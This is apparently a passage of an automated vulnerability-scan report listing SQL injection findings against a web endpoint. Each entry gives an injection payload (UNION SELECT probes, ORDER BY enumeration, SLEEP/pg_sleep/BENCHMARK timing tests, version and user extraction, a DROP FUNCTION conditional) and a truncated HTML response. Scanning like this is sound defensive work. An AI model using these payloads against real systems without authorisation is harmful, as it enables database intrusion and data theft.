unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1226\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1227Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1228\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1229\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1230\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1231\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1232\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1233\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1234\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1235Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION \nxcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1236\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1237\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1238\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1239\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1240\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 